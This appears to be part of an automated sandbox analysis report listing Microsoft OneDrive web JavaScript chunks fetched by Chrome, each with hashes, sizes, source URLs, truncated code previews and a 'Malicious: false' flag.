                                                  Preview:/*! For license information please see odsp.knockout.lib-848c845f.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.knockout.lib"],{"knockout-projections-lib":function(e,t,n){var a,i,r;!function(o){"use strict";function s(e,t,n,a,i,r,o){this.inputItem=t,this.stateArrayIndex=n,this.mappingOptions=i,this.arrayOfState=r,this.outputObservableArray=o,this.outputArray=this.outputObservableArray.peek(),this.isIncluded=null,this.suppressNotification=!1,this.outputArrayIndex=e.observable(a),this.disposeFuncFromMostRecentMapping=null,this.mappedValueComputed=e.computed(this.mappingEvaluator,this),this.mappedValueComputed.subscribe(this.onMappingResultChanged,this),this.previousMappedValue=this.mappedValueComputed.peek()}function c(e,t){if(!e)return null;switch(e.status){case"added":return e.index;case"deleted":return e.index+t;default:throw new Error("Unknown diff status: "+e.status)}}function d(e,t,n,a,i,r,o,c,d){var l="number"==typeof t.moved,u=l?n[t.move
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (44971)
                                                  Category:dropped
                                                  Size (bytes):52635
                                                  Entropy (8bit):5.391405624712577
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:044851E361725F5942D025ED4CE6C420
                                                  SHA1:8608489E3B115877C973ED901D935FDB681B6765
                                                  SHA-256:96C73B894BCEBBF3816A7F05458B8603741A46046DAA54F41125747016B20E4D
                                                  SHA-512:8B2DAC7F9D26F210AF6796930095CC6356D64C18E28C9CD077E06138AB28D365570300113AF038CDC7F16996FEE7A8F57D7E24B677BB44A1F45512FF33692F43
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[168],{2135:function(e,t,n){n.r(t),n.d(t,{ContextualControlHandlersProvider:function(){return u},ControlHandlerProvider:function(){return l},RootContextualControlHandlerBridge:function(){return r.b},controlHandlersMemoizer:function(){return d},createContextualControlHandlerProvider:function(){return r.c},createUseElementsWithContextualControlHandlers:function(){return r.d},renderChildrenWithControlHandlers:function(){return f},renderElementsWithContextualControlHandlers:function(){return m},useComposedControlHandlers:function(){return _},useElementsWithContextualControlHandlers:function(){return p}});var a=n("tslib_102"),i=n("react-lib"),r=n(94),o=n(1),s=n("fui.util_369"),c=n(43),d=(0,s.dY)(function(e){return(0,s.dY)(function(t){return(0,a.W_)((0,a.W_)({},e),(0,c.b)(t,function(t,n){var a=o.a.get(n),i=e[a.id];return i&&a.compose(t,i)||t}))})});function l(e){var t=e.controlHandlers;return p(e.children,t)}functio
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6851)
                                                  Category:dropped
                                                  Size (bytes):6856
                                                  Entropy (8bit):5.156313737644278
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:27B90623A552142EC827CD34BBD50F84
                                                  SHA1:F57E48F090DEC2D394CEC1B9FDDCA6A1313FFAAF
                                                  SHA-256:A5BAC2B68900EC80F71AB98E0B72B324CB8F334CE18E07BAC6D4B010600C03CF
                                                  SHA-512:CA87E1AD3EC9795F9218D4B022153879339BFB1C72C2D9FB069E28E1C964FDB9AD8750642586824253C8D35153D863E43A97A66948E8ADF62130C50801D74179
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1874],{6739:function(e,t,n){n.r(t);var a=n("tslib_102"),i=n(118),r=n("odsp.util_460"),o=n(10),s=n(8400),c=n(1262),d=n(4301),l={ODB:459},u={ODB:!0},f=["Due to organizational policies, you can't access these resources from this network location","One of the provided arguments is not acceptable","Session has been revoked","The access token has expired","The caller does not have permission to perform the action","The caller is not authenticated","The request is malformed or incorrect","There has been an error authenticating the request"],p=function(){function e(e,t){this._firedConnectQoSEvent=!1,this._getSubscriptionAttempts=0,this._socketIoReconnectAttempts=0,this._notificationHandlers={},this._connectionHandlers={},this._disableWebSockets=e.disableWebSockets,this._subscriptionService=t.subscriptionService,this._sessionTokenFetcher=t.sessionTokenFetcher,this._async=new i.a,this._socketIoReconnectAttempts=0}retur
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (18796)
                                                  Category:dropped
                                                  Size (bytes):61276
                                                  Entropy (8bit):5.043378553842325
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0162D53ECFBDAFDDC0439188F36E873D
                                                  SHA1:5F58140C2E1E86DC8D2AD24AD7EC2766326593D7
                                                  SHA-256:AE36B438CC9BB01A470E261AE3983E956C3019EF97E24DB100362661405553EF
                                                  SHA-512:40E047B1BBB0FBF1D7486A427BB1DD0A81B726F62CEBC4E457142B6D50C83B867B0A8045F848C61A52E6878F90B4F6BFADECC479E9C6ABAD94792D64EC142E76
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{1042:function(e){e.exports=JSON.parse('{"d":"Copilot","e":"Show Copilot actions for selected items","j":"Summarize","l":"Summarize \\u0022{0}\\u0022","k":"Summarize these files","b":"Compare files","c":"Compare the differences between these files and put them in a table view","f":"Create an FAQ","g":"Create an FAQ from \\u0022{0}\\u0022","a":"Ask a question","n":"Get insights on multiple files with Copilot","m":"Quickly summarize, compare, and get answers from multiple files without opening them.","i":"Summarize files","h":"Got it"}')}.,1072:function(e){e.exports=JSON.parse('{"a":"Show Copilot actions for this item"}')}.,814:function(e){e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1854:function(e){e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,287:function(e){e.exports
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):112010
                                                  Entropy (8bit):5.287890917425796
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5324AC2A8E25903A193A1CA1F648BFC9
                                                  SHA1:7376900DB000964855B08A83162B841DAA8E867A
                                                  SHA-256:9174968F601C80326390D06F191F6CA0B96840F35F07422069F47DA7ECF11B01
                                                  SHA-512:84F5A44158DC2DB987BA5F2413B88D2CEEDB88186E7CA8DDADBF0BAA1872837069F753ACBF644598FE9FC2384FB052242DF0CBEAB01A064CA580A7776F641482
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/36074.js
                                                  Preview:(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[36074],{422058:(e,t,n)=>{"use strict";n.d(t,{j:()=>re});var a,i=n(295610),r=n(538054),o=n(836682),s=n(82999),c=n(262708),d=n(633472),l=n(188830),u=n(689356),f=n(135556),p=n(230336),m=n(485942),_=n(383417),h=n(686247),b=n(147714),g=n(252400),v=n(567022),y=n(610388),S=n(351329),D=n(607539),I=n(551638),x=function(){function e(e){var t=this;this.playbackRates=I.a,this.playerStats={ttlMs:void 0,ttirMs:void 0},this.playState=new D.Y(void 0),this.autoplayFailed=new D.Y(void 0),this.isFullscreen=new D.Y(void 0),this.loadingState=new D.Y("None"),this.currentTimeInSeconds=new D.Y(void 0),this.seeking=new p.y,this.isActive=new p.y,this.isPlayerReady=new D.Y(!1),this.isPreRoll=new D.Y(!0),this.isAltTrackReady=new D.Y(!1),this.audioStreamSwitchingFailed=new D.Y(!1),this.muted=new D.Y(!1),this.loop=new D.Y(!1),this.mediaDurationInSecondsV2=new D.Y(0),this.playbackRate=new D.Y(1),this.downloadBitrate=new D.Y(void 0),th
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (18788)
                                                  Category:downloaded
                                                  Size (bytes):60240
                                                  Entropy (8bit):5.045074466646511
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ADC22BB1DCE4050CF3EB6B08E05E2322
                                                  SHA1:E298F501FC80AE3DC87BE7D864D3886C9C64C56A
                                                  SHA-256:E8FBFA2AB07FB21E18FFD9C705C028D5182E6006EDBF1A35AC8C198A69E059D3
                                                  SHA-512:F7636673B72EA33D31F36053F647571BB8D38282D1FB61DE174844A6CE8A3B6B85AB46C2C67F95B81E63AF082BEE7279E4EC591784CA1BDFC9D7E2ED4BCE7FD5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/file-browser-odb-meta-os/en-us/initial.resx.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{1022:e=>{e.exports=JSON.parse('{"d":"Copilot","e":"Show Copilot actions for selected items","j":"Summarize","l":"Summarize \\u0022{0}\\u0022","k":"Summarize these files","b":"Compare files","c":"Compare the differences between these files and put them in a table view","f":"Create an FAQ","g":"Create an FAQ from \\u0022{0}\\u0022","a":"Ask a question","n":"Get insights on multiple files with Copilot","m":"Quickly summarize, compare, and get answers from multiple files without opening them.","i":"Summarize files","h":"Got it"}')}.,1032:e=>{e.exports=JSON.parse('{"a":"Show Copilot actions for this item"}')}.,852:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1742:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,307:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My fi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5371)
                                                  Category:downloaded
                                                  Size (bytes):5421
                                                  Entropy (8bit):4.570228392925458
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6557374417DF64FDA7DFB648BFAD7095
                                                  SHA1:784F717F8488DDA13E09B179C22F981D9488E2B3
                                                  SHA-256:57A278E4650F566BDF0BD713CD0656DACB39A9ED50510B2EA7C36B04124B21BB
                                                  SHA-512:A5EFF506BD0185B7787CB5D0770BE203726BDBBC9712426C7B99678D026B5C453858BBA4637D8AA64ABB64B116DD88EFFFFD73B4491AF23C75169E5F106B1358
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/14.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[14],{8042:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return o},d:function(){return d},e:function(){return l},f:function(){return s},g:function(){return c},h:function(){return _},i:function(){return h},j:function(){return u},k:function(){return f},l:function(){return p},m:function(){return m},n:function(){return b}});var a=n(5901);const i=(0,a.a)("ArrowUndo16Regular","16",["M3 2.5a.5.5 0 0 1 1 0v3.84l3.17-3.17a4 4 0 0 1 5.66 5.66L7.8 13.85a.5.5 0 0 1-.7-.7l5.02-5.03a3 3 0 1 0-4.24-4.24L4.76 7H8.5a.5.5 0 0 1 0 1H3.6a.6.6 0 0 1-.6-.6V2.5Z"],{flipInRtl:!0}),r=(0,a.a)("ArrowUpload16Filled","16",["M3.75 2a.75.75 0 0 0 0 1.5h8.5a.75.75 0 0 0 0-1.5h-8.5Zm4.78 2.72a.75.75 0 0 0-1.06 0L4.22 7.97a.75.75 0 0 0 1.06 1.06l1.97-1.97v6.19a.75.75 0 0 0 1.5 0V7.06l1.97 1.97a.75.75 0 1 0 1.06-1.06L8.53 4.72Z"]),o=(0,a.a)("ArrowUpload16Regular","16",["M3.5 2a.5.5 0 0 0 0 1h9a.5.5 0 0 0 0-1h
                                                  No static file info